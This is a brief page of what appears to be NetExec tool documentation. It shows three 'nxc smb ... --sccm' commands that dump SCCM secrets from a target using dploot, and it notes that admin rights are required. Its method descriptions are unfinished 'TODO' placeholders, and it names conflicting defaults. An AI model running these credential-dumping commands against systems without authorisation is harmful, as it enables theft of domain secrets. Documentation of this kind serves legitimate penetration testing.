πŸ†• Dump SCCM

Dump the SCCM from target using methods from dploot

{% hint style="danger" %}
Requires Domain Admin or Local Admin Priviledges on target Domain Controller
{% endhint %}

2 methods are available:   
(default)   wmi -  TODO
            disk - TODO (default)
nxc smb <target> -u <username> -p <password> --sccm
nxc smb <target> -u <username> -p <password> --sccm disk
nxc smb <target> -u <username> -p <password> --sccm wmi